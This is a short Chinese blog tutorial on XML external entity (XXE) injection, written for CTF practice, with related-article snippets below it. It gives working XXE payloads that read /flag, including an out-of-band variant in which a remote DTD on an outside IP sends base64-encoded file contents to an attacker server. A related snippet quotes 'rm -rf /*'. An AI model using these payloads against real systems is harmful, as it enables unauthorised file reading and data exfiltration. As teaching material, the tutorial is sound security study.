XXE (实体注入)

于 2024-07-30 08:15:00 发布
阅读量288 收藏 2
点赞数 7
分类专栏: # owasp top10 # CTF+靶场 文章标签: 服务器 linux 运维 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/140781314
版权

🎼个人主页:金灰

😎作者简介:一名简单的大一学生;易编橙·终身成长社群的嘉宾.✨

专注网络空间安全服务,期待与您的交流分享~

感谢您的点赞、关注、评论、收藏、是对我最大的认可和支持!❤️

🍊易编橙·终身成长社群🍊 : http://t.csdnimg.cn/iSLaP 期待您的加入~

免责声明:本文仅做分享...

目录

XXE认识

利用:

1 有回显时文件读取方法

2 无回显时文件读取方法

XXE认识

xxe的利用
XML Entity    (实体注入)
当程序处理xml文件时,没有禁止对外部实体的处理,容易造成xxe漏洞.

危害:
主流是任意文件读取

XML 文件:
一般表示带有结构的数据

多级,分层
xml格式

 

 

利用:

1 有回显时文件读取方法

抓包,改POST方法---->

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
    <!ENTITY hacker SYSTEM "file:///flag">
]> 				//定义hacker变量

<root>
    <ctfshow>
        &hacker;	//执行hacker
    </ctfshow>
</root>

2 无回显时文件读取方法

外带
---------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE hacker[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % myurl SYSTEM "http://43.154.107.226/test.dtd">
    %myurl;
]> 
<root>
1
</root>
----------------------------------------------

远程test.dtd内容:
<!ENTITY % dtd "<!ENTITY &#x25; vps SYSTEM 'http://IP:3389/%file;'> ">
%dtd;
%vps;
------------------------------------------------
服务端监听,



#tail -F access.log

金灰
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
XXE(XML 实体注入)漏洞攻防分析1
08-08
所以XXE和xss,sqli 等一样都是比较广泛的漏洞,所以从以往发现的漏洞可以看到很多厂商都存在这种漏洞,包括邮箱、门户、通用CMS等,如网易、腾讯邮箱XXE
xxe实体注入
qq_42307546的博客
01-25 1576
XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入 由于 xxe 漏洞主要是利用了 DTD 引用外部实体导致的漏洞,那么重点看下能引用哪些类型的外部实体。当 libXML <libxml2.9 才会造成外部注入漏洞。 XXE漏洞代码分析 &l
XXE实体注入(超详细!)
qq_45300786的博客
09-06 9714
可以把它理解为txt,就是存储文件的, 读取并调用出来,这是最核心的 将你的代码当成XXE代码,然后XXE再交给PHP去执行 将1.txt的东西,放入test这个变量 实体就是变量 &test就是输出这个变量 <scan></scan>只是一个声明格式,随便写什么,就算写成<abc></abc>都可以,只要满足<x></x>格式就行 最主要的是访问的地址,file,http等协议都可以。 XXE:XML外部实体注入,原理:.
XXE 实体注入
guishengyx的博客
04-27 242
服务器因为你的传参发送数据包 我的传参为什么会让服务器发送数据包? 翻译网页功能如何实现 翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户 典型的SSRF:用户传参然后服务器去访问 SSRF危害: 访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...
XXE实体注入
qq_33557485的博客
05-05 373
1.XXE原理 XML被设计用来传输和存储数据。所以在网站中可以使用XML来读取或者写入数据。 如果用户可以控制XML代码,既可以利用XML读取任意文件。 2.php相关漏洞 php中有个函数:simplexml_load_string()。这个函数是将XML转化为对象,然后在php中使用。 3.注入小技巧 很多时候注入都是没有回显的,对于这类XXE来说,可以用XML将目标读取出来,然后...
XXE实体注入原理作用与具体操作
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-12 973
XXE——实体注入 原理:XXE=XML External Entity 即外部实体,即外部实体,从安全角度理解成XML External Entity attack XML 外部实体注入攻击 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据,定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 当XML允许引用外部实体时,通过构造恶意XML文档,根据建站语言使用不同的协议可导致读取任意文件内容、执行系统命令、探测内网端口、访问内网网站等危害。由于站点的建站语言不同,PHP、JA
测试XXE注入.docx
09-06
XXE 注入(XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
信息安全_xxe注入应用与拓展.pptx
08-14
如果应用程序未正确配置或过滤这些实体,攻击者可以通过构造恶意的XML输入来触发XXE注入。 **XXE的常见应用场景:** 1. **基于XML的RPC服务**:如Zend框架的XML-RPC模块,攻击者可以通过发送包含恶意实体的XML请求...
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体是 XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
FTP服务基础搭建
07-24 1112
FTP客户端从任意一个非特权端口N(N>1024)发送PORT命令给FTP服务端控制端口21,FTP客户端从任意一个非特权端口N(N>1024)发送PASV命令给FTP服务端控制端口21,高端端口P(P>1024),并发送PORT命令给客户端,PORT命令包括服务端的数据端口P,设置FTP用户访问FTP服务器时,将所有FTP用户访问的目录限制在自己的主目录中,设置FTP用户访问FTP服务器时,将部分FTP用户访问的目录限制在自己的主目录中,它就会让自己的数据端口20与客户端的数据端口N+1连接。
Linux初学基本命令
yuan20010401的博客
07-25 139
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
Linux】条件变量及生产者消费者模型
2301_78636079的博客
07-23 1156
条件变量与生产消费者模型
Linux 某进程 CPU 高问题,用 Shell 脚本发现处理
Richardlygo的博客
07-24 471
首先,我们需要编写一个Shell脚本来发现系统中CPU使用率最高的进程。分析原因:在采取任何行动之前,分析高CPU使用率的原因,可能是代码问题、资源争用或其他因素。优化和调整:根据分析结果,对系统或应用程序进行优化和调整,以避免类似问题的再次发生。记录日志:在脚本中添加日志记录功能,记录高CPU使用率的进程信息,以供后续分析。语句判断该进程的CPU使用率是否超过设定的阈值,并输出相应的信息。在发现高CPU使用率的进程后,我们需要决定如何处理它。获取进程CPU使用率:对上一步获取的进程ID使用。
Linux】一些基本指令
weixin_73914025的博客
07-25 701
在学习操作系统的时候,我们应该要清楚操作系统是什么。操作系统是一款进行软硬件资源管理的软件。如果没有操作系统,即使是有一台好的电脑配有一套好的鼠标和键盘,我们也无法使用这台电脑。所以我们也就知道了为什么要进行软硬件资源管理,目的就是为我们使用机器提供了良好的服务。我们在《Linux的环境搭配中》提到了云服务器的使用,为了方便学习,我在Linux的学习中,将会使用云服务器来进行学习。在上面提到的那片文章中,我们提到了Xshell,我们在每次打开Xshellssh (用户名)@(公网IP)
Linux-管道与输入输出重定向
weixin_57370131的博客
07-24 216
【代码】Linux-管道与输入输出重定向。
如何使用虚拟机如何安装 Kali Linux
最新发布
一名初中生
07-25 299
虚拟机安装kali linux
【C语言】Linux 飞翔的小鸟
Minuhy
07-22 628
Linux下运行的,用C语言编写的飞翔的小鸟,一款挺无聊的小游戏,分享给大家~
SecureCRT连接Linux时乱码问题
jupiter_888的博客
07-24 412
使用SecureCRT输入中文出现乱码的问题,通常与字符编码和终端的显示设置有关.发生乱码的原因主要是有三个地方1.Linux的etc的系统默认配置的编码2.用户环境变量里面设置的LANG变量3.SecureCRT会话变量里面的字符集的设置只要保持这三个地方的字条集编码保持一致就可以了。
webug4.0xxe注入
07-27
XXE(XML External Entity)注入是一种攻击技术,用于利用应用程序对外部实体的处理不当。通过在用户提供的输入中插入恶意的实体引用,攻击者可以读取本地文件、执行远程请求等。针对这种注入漏洞,应用程序应该对用户输入进行严格的过滤和验证,以避免恶意实体注入。 关于Webug 4.0的XXE注入漏洞,我不清楚具体的细节和漏洞位置。通常,修补XXE注入漏洞的方法是通过禁用外部实体的解析或限制实体解析的范围。为了更好地保护应用程序免受XXE注入攻击,您可以参考以下几点建议: 1. 输入过滤和验证:对用户输入进行严格的过滤和验证,确保只接受合法的输入。可以使用白名单过滤或正则表达式等技术来限制输入。 2. 禁用外部实体解析:在解析XML时,禁用外部实体的解析。这可以防止恶意实体注入。 3. 限制实体解析范围:如果应用程序需要解析实体,应该限制解析的范围,只允许解析特定的实体或特定的命名空间。 4. 使用安全的XML解析器:确保使用最新版本的XML解析器,并开启安全配置选项,以防止XXE注入攻击。 请注意,以上建议仅为一般性指导,具体修补漏洞需要根据应用程序和环境的特定情况来确定。建议您在修复漏洞之前,先了解Webug 4.0的文档、漏洞报告或咨询安全专家以获取更准确的信息和解决方案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值